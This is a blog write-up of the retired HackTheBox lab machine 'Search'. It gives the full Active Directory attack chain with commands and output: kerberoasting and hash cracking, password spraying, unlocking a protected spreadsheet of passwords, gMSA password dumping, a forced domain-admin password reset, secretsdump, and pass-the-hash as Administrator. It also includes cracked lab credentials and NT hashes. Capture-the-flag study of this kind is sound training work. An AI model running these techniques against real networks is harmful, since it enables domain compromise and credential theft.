<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>HackTheBox - Search | haicen.me</title>
<link href="../../assets/css/all-nocdn.css" rel="stylesheet" type="text/css">
<meta name="theme-color" content="#5670d4">
<meta name="generator" content="Nikola (getnikola.com)">
<link rel="alternate" type="application/rss+xml" title="RSS" hreflang="en" href="../../rss.xml">
<link rel="canonical" href="https://blog.haicen.me/posts/hackthebox-search/">
<!--[if lt IE 9]><script src="../../assets/js/html5.js"></script><![endif]--><meta name="author" content="Haicen">
<link rel="prev" href="../configuring-custom-headers-for-owasp-zap/" title="Configuring custom headers for OWASP ZAP" type="text/html">
<link rel="next" href="../fun-with-guids/" title="Fun with GUID's" type="text/html">
<meta property="og:site_name" content="haicen.me">
<meta property="og:title" content="HackTheBox - Search">
<meta property="og:url" content="https://blog.haicen.me/posts/hackthebox-search/">
<meta property="og:description" content="Introduction
Search is a retired HackTheBox machine which contains several common windows exploits.
I completed this box a while ago, but it now that it has retired, I can post my writeup.
Some of the">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2022-07-20T08:34:09-04:00">
<meta property="article:tag" content="active directory">
<meta property="article:tag" content="crackmapexec">
<meta property="article:tag" content="hacking">
<meta property="article:tag" content="nmap">
<meta property="article:tag" content="windows">
</head>
<body>
<a href="#content" class="sr-only sr-only-focusable">Skip to main content</a>

<!-- Menubar -->

<nav class="navbar navbar-inverse navbar-static-top"><div class="container">
<!-- This keeps the margins nice -->
        <div class="navbar-header">
            <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-navbar" aria-controls="bs-navbar" aria-expanded="false">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="https://blog.haicen.me/">

                <span id="blog-title">haicen.me</span>
            </a>
        </div>
<!-- /.navbar-header -->
        <div class="collapse navbar-collapse" id="bs-navbar" aria-expanded="false">
            <ul class="nav navbar-nav">
<li>
<a href="../../archive.html">Archive</a>
                </li>
<li>
<a href="../../categories/">Tags</a>
                </li>
<li>
<a href="../../rss.xml">RSS feed</a>
                </li>
<li>
<a href="../../pages/about-me">Contact Me</a>

                
            </li>
</ul>
<ul class="nav navbar-nav navbar-right"></ul>
</div>
<!-- /.navbar-collapse -->
    </div>
<!-- /.container -->
</nav><!-- End of Menubar --><div class="container" id="content" role="main">
    <div class="body-content">
        <!--Body content-->
        <div class="row">
            
            
<article class="post-text h-entry hentry postpage" itemscope="itemscope" itemtype="http://schema.org/Article"><header><h1 class="p-name entry-title" itemprop="headline name"><a href="." class="u-url">HackTheBox - Search</a></h1>

        <div class="metadata">
            <p class="byline author vcard p-author h-card"><span class="byline-name fn p-name" itemprop="author">
                    Haicen
            </span></p>
            <p class="dateline">
            <a href="." rel="bookmark">
            <time class="published dt-published" datetime="2022-07-20T08:34:09-04:00" itemprop="datePublished" title="2022-07-20 08:34">2022-07-20 08:34</time></a>
            </p>
            

        </div>
        

    </header><div class="e-content entry-content" itemprop="articleBody text">
    <section id="introduction"><h2>Introduction</h2>
<p>Search is a retired HackTheBox machine which contains several common windows exploits.
I completed this box a while ago, but it now that it has retired, I can post my writeup.
Some of the tools used to complete this box are: crackmapexec, gmsadumper, bloodhound, smbclient, and rpcclient.</p>
<!-- TEASER_END -->
</section><section id="recon"><h2>Recon</h2>
<p>Start with an nmap scan</p>
<pre class="literal-block">sudo nmap -sC -sV -oX initial 10.10.11.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-24 20:46 EDT
Nmap scan report for 10.10.11.129
Host is up (0.042s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search &amp;mdash; Just Testing IIS
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-25 00:46:21Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-03-25T00:47:41+00:00; +1s from scanner time.
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search &amp;mdash; Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
| tls-alpn:
|_  http/1.1
|_ssl-date: 2022-03-25T00:47:41+00:00; +1s from scanner time.
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2022-03-25T00:47:41+00:00; +1s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-03-25T00:47:41+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-03-25T00:47:41+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-03-25T00:47:04
|_  start_date: N/A</pre>
<p>The nmap scan returned a lot of information, however, there are a few key ports that reveal information about the machine.</p>
<p>LDAP on port 389 is a big clue that this is a domain controller.</p>
<p>First, I looked at the website.
There are lots of images being shown in the slide deck.
Let's investigate those.</p>
<img alt="/images/htb-search/slide_2.jpg" src="../../images/htb-search/slide_2.jpg"><p>This image has some handwritten notes.
On the planner, there is a line that says "send password to Hope Sharp IsolationIsKey?".
This looks promising.</p>
<p>While I don't know the username format for this org, I made a python script that generates possible combinations.
<a class="reference external" href="https://github.com/haicenhacks/username-generator">https://github.com/haicenhacks/username-generator</a>.
I put the name "Hope Sharp" in the names.txt file and ran the script
python generate_usernames.py -i names.txt -o usernames.txt</p>
<p>Next, I ran crackmapexec to test which of these were valid</p>
<pre class="literal-block">crackmapexec smb search.htb -u usernames.txt -p 'IsolationIsKey?'
SMB         10.10.11.129    445    RESEARCH         [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.129    445    RESEARCH         [+] search.htb\hope.sharp:IsolationIsKey?</pre>
<p>Logging in with smb reveales a few shares, but Hope Sharp does not have access to any</p>
<pre class="literal-block">smbclient -L //search.htb -U hope.sharp
Enter WORKGROUP\hope.sharp's password:

      Sharename       Type      Comment
      ---------       ----      -------
      ADMIN$          Disk      Remote Admin
      C$              Disk      Default share
      CertEnroll      Disk      Active Directory Certificate Services share
      helpdesk        Disk
      IPC$            IPC       Remote IPC
      NETLOGON        Disk      Logon server share
      RedirectedFolders$ Disk
      SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available</pre>
<p>The next thing I tried was kerberoasting</p>
<pre class="literal-block">Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

ServicePrincipalName               Name     MemberOf  PasswordLastSet             LastLogon  Delegation
---------------------------------  -------  --------  --------------------------  ---------  ----------
RESEARCH/web_svc.search.htb:60001  web_svc            2020-04-09 08:59:11.329031  &lt;never&gt;



[-] CCache file is not found. Skipping...
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$b13f647c815289acbc8c0338a518f1e3$3cb01b7fed4 &lt;snip&gt; c4e0cade4fb0b97417d28e20a</pre>
<p>This gets a kerberos ticket granting ticket, which can be cracked using</p>
<pre class="literal-block">hashcat -m 13100 web_svc.hash /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt

@3ONEmillionbaby</pre>
<p>Since I had valid credentials from Hope Sharp, the other domain users can be dumped using bloodhound or ldapdomaindump, and extract the sam account name from the output</p>
<pre class="literal-block">ldapdomaindump -u search\\hope.sharp -p IsolationIsKey? 10.10.11.129
cat domain_users.grep | awk -F'\t' '{print $3}' &gt; sam_names.txt</pre>
<p>Using the sam names, I tried password spraying the password from the kerberoasted user web_svc</p>
<pre class="literal-block">crackmapexec smb search.htb -u sam_names.txt -p @3ONEmillionbaby --continue-on-success</pre>
<p>This shows the user Edgar.Jacobs has reused their password when creating the web_svc account</p>
<p><code class="docutils literal">SMB         10.10.11.129    445    RESEARCH         [+] <span class="pre">search.htb\Edgar.Jacobs:@3ONEmillionbaby</span></code></p>
<p>Next, I checked the SMB shares to see if Edgar.Jacobs can access anything else.</p>
<pre class="literal-block">smbclient  -L //search.htb -U edgar.jacobs
Enter WORKGROUP\edgar.jacobs's password:

      Sharename       Type      Comment
      ---------       ----      -------
      ADMIN$          Disk      Remote Admin
      C$              Disk      Default share
      CertEnroll      Disk      Active Directory Certificate Services share
      helpdesk        Disk
      IPC$            IPC       Remote IPC
      NETLOGON        Disk      Logon server share
      RedirectedFolders$ Disk
      SYSVOL          Disk      Logon server share

smbmap -u smbmap -u edgar.jacobs -p @3ONEmillionbaby -d search -H 10.10.11.129

smbmap -u smbmap -u edgar.jacobs -p @3ONEmillionbaby -d search -H 10.10.11.129 -R RedirectedFolders$</pre>
<p>There is an interesting file on Edgar's desktop called "Phishing_Attempt.xlsx", and the flag is under Sierra Frye's account, unfortunately the sheet is protected.
I removed the sheet protection by</p>
<ol class="arabic simple">
<li><p>renaming the file as Phishing_Attempt.zip</p></li>
<li><p>unzip the file</p></li>
<li><p>modify the xl/sheet2.xml file to remove the protection value</p></li>
<li><p>re-zip the file</p></li>
<li><p>rename it Phishing_Attempt.xlsx</p></li>
</ol>
<img alt="/images/htb-search/phishing_xls.png" src="../../images/htb-search/phishing_xls.png"><p>unzip the new file</p>
<img alt="/images/htb-search/phishing_xls_extracted.png" src="../../images/htb-search/phishing_xls_extracted.png"><p>delete the cell protection</p>
<img alt="/images/htb-search/phishing_xls_protected.png" src="../../images/htb-search/phishing_xls_protected.png"><p>zip it up and rename it</p>
<img alt="/images/htb-search/phishing_xls_unprotected.png" src="../../images/htb-search/phishing_xls_unprotected.png"><p>the file now shows the passwords</p>
<p>Using Sierra Frye's password, I can now get the user flag.</p>
<p>The next step is to figure out how to escalate privleges to get the admin flag.</p>
<pre class="literal-block">bloodhound-python -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -ns 10.10.11.129 -d search.htb -c all``</pre>
<p>Then start Bloodhound.
I marked Hope, Edgar, and Sierra as owned users, then ran the "shortest path to Domain Admins" query".
Since I have Sierra's credentials, the path is this: <code class="docutils literal">sierra.frye <span class="pre">-&gt;</span> ITSEC@search.htb <span class="pre">-&gt;</span> <span class="pre">BIR-ADFS-GMSA@search.htb</span> <span class="pre">-&gt;</span> tristan.davies <span class="pre">-&gt;</span> Domain Admin</code></p>
<img alt="/images/htb-search/bloodhound_path_to_admin.png" src="../../images/htb-search/bloodhound_path_to_admin.png"><p>Since Sierra has the read GMSA password permission, I can dump the GSMA password.</p>
<pre class="literal-block">python3 gMSADumper.py -d search.htb -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Users or groups who can read password for BIR-ADFS-GMSA$:
 &gt; ITSec
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

rpcclient -U 'BIR-ADFS-GMSA$' --pw-nt-hash //10.10.11.129
Enter WORKGROUP\BIR-ADFS-GMSA$'s password: e1e9fd9e46d0d747e1595167eedcec0f &lt; paste the gmsa password here
rpcclient $&gt; setuserinfo2 tristan.davies 23 'password'
rpcclient $&gt;</pre>
<p>Now, I have set Tristan Davies (member of domain admins group) password to "password".</p>
<p>Run secretsdump to obtain all the password hashes</p>
<pre class="literal-block">secretsdump.py search.htb/tristan.davies:password@10.10.11.129 -just-dc</pre>
<p>Using pass the hash, I can access SMB as Administrator</p>
<pre class="literal-block">smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6 administrator@search.htb</pre>
<p>and get the root flag</p>
</section>
</div>
    <aside class="postpromonav"><nav><ul itemprop="keywords" class="tags">
<li><a class="tag p-category" href="../../categories/active-directory/" rel="tag">active directory</a></li>
            <li><a class="tag p-category" href="../../categories/crackmapexec/" rel="tag">crackmapexec</a></li>
            <li><a class="tag p-category" href="../../categories/hacking/" rel="tag">hacking</a></li>
            <li><a class="tag p-category" href="../../categories/nmap/" rel="tag">nmap</a></li>
            <li><a class="tag p-category" href="../../categories/windows/" rel="tag">windows</a></li>
        </ul>
<ul class="pager hidden-print">
<li class="previous">
                <a href="../configuring-custom-headers-for-owasp-zap/" rel="prev" title="Configuring custom headers for OWASP ZAP">Previous post</a>
            </li>
            <li class="next">
                <a href="../fun-with-guids/" rel="next" title="Fun with GUID's">Next post</a>
            </li>
        </ul></nav></aside></article>
</div>
        <!--End of body content-->

        <footer id="footer">
            Contents © 2023         <a href="mailto:haicenhack@protonmail.com">Haicen</a> 
            
        </footer>
</div>
</div>


            <script src="../../assets/js/all-nocdn.js"></script><!-- fancy dates --><script>
    moment.locale("en");
    fancydates(0, "YYYY-MM-DD HH:mm");
    </script><!-- end fancy dates --><script>
    baguetteBox.run('div#content', {
        ignoreClass: 'islink',
        captions: function(element) {
            return element.getElementsByTagName('img')[0].alt;
    }});
    </script>
</body>
</html>
